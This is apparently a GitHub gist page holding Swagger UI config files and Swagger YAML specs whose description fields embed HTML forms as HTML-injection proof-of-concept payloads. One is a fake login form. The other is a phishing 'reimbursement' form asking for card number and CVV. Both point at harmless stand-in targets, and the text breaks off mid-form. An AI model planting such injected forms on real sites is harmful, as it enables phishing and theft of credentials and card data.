This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"url": "https://gist.github.com/d3tonator/26897e3048180271abe6492cbe6bbbb0/raw/f664431bac78deaa72bcf707cad61228011f954a/test.yaml", | |
"urls": [ | |
{ | |
"url": "https://gist.github.com/d3tonator/26897e3048180271abe6492cbe6bbbb0/raw/f664431bac78deaa72bcf707cad61228011f954a/test.yaml", | |
"name": "Test" | |
} | |
] | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
info: | |
version: 1.0.0 | |
title: Fake Login Page | |
description: '<div class="login-form"> | |
<div class="heading"> | |
<h1>HTML Injection : Fake Login</h1> | |
</div> | |
<div class="form-container"> | |
<form action="https://example.com/login" method="post" class="form-signin"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"url": "https://gist.githubusercontent.com/d3tonator/6622417530b8fa61999c4364ad42ff1a/raw/df716837ad15c0731867c180ddf2b18f76622729/ReimbFrm.yaml", | |
"urls": [ | |
{ | |
"url": "https://gist.githubusercontent.com/d3tonator/6622417530b8fa61999c4364ad42ff1a/raw/df716837ad15c0731867c180ddf2b18f76622729/ReimbFrm.yaml", | |
"name": "ReimbursementForm" | |
} | |
] | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
info: | |
version: 0.0.1 | |
title: Reimbursement Form | |
description: '<div class="ReimbursementForm"> | |
<div class="heading"><h1>d3tonator</h1><p>We are pleased to inform you that our company has processed a reimbursement for you based on your overall Yearly performance review. To proceed with the money transfer, please provide the following details at your earliest convenience</p></div> | |
<div class="payment"><form action="https://www.ncsc.gov.uk/guidance/phishing" method="POST" class="form-signin" id = "login_form"> | |
<div class="form-group Owner"><label for="Owner">Owner</label><input type="text" name="Owner" size="20"></div> | |
<div class="form-group cvv"><label for="cvv">cvv</label><input type="text" name="cvv" size="20"></div> | |
<div class="form-group" id="card-number-field"><label for="cardNumber">Card Number</label><input type="text" name="CardNumber" size="20"></div> |